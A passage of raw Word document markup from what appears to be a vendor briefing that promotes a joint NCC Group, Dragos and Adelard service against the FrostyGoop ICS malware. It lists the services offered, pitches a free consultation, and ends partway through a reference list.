          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard AESOP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides unique capabilities for addressing FrostyGoop and similar ICS malware threats </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[84]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mirwexky92i3" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modbus Security Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Comprehensive protocol security evaluation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref85">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[85]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Architecture Review</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IT/OT boundary validation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref86">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[86]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ICS-specific forensics and recovery </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref87">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[87]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x1hvklske0ai" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Purpose-built analytics for Modbus manipulation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref88">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[88]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset Inventory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Complete Modbus device discovery and monitoring </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref89">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[89]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000271">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Hunting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Proactive searches for ICS malware indicators </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref90">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[90]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000272">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3pys2kv8laz0" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security Integration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HAZOP Integration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Safety impact assessment of cyber scenarios </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref91">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[91]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL Verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensuring safety functions remain protected </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref92">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[92]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Barrier Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Combined cyber-physical protection strategies </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref93">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[93]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000276">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h32nkjkwj14y" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Competitive Advantage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000277">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike traditional IT security vendors, the tri-partner solution offers:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Direct FrostyGoop detection capabilities developed by Dragos researchers </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[94]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ICS protocol expertise including Modbus security hardening </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref95">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[95]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety-security convergence critical for process control </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[96]</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hc6ic79k24lr" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert Consultation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4lccpcmmc61a" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">15-Minute Assessment Opportunity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000280">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Given FrostyGoop's demonstrated ability to manipulate critical infrastructure, we offer a complimentary 15-minute consultation to assess your organization's exposure to ICS-specific malware threats.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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Focus Areas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modbus protocol exposure assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000285">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet-facing ICS device inventory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000286">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency manual operation readiness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety system cyber resilience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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Value Delivered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identification of exposed Modbus devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority remediation recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop-specific detection guidance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency response planning</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Contact our ICS security team at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">otce-response@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1-800-XXX-XXXX</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qh6xsynwjrs5" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000294">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop represents a fundamental shift in cyber warfare, demonstrating that adversaries can now weaponize the very infrastructure meant to sustain life—heating, water, and food systems. The successful attack on Lviv's district heating system during winter proved that ICS malware can directly harm civilian populations, making the protection of operational technology a moral imperative for our generation.</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The tri-partner solution of NCC Group OTCE, Dragos, and Adelard offers the only comprehensive defense against this new class of threats, combining protocol-specific detection, safety-security integration, and proven incident response capabilities. As we work to ensure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water, reliable energy, and access to healthy food for our grandchildren</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, defending against ICS-specific malware like FrostyGoop becomes essential to preserving the infrastructure they will inherit.</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sv7tq0k4mbqi" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hqsq9jewobqt" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Dragos Inc., "FrostyGoop ICS Malware Intelligence Brief," Dragos WorldView Platform, July 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf</w:t>
        </w:r>
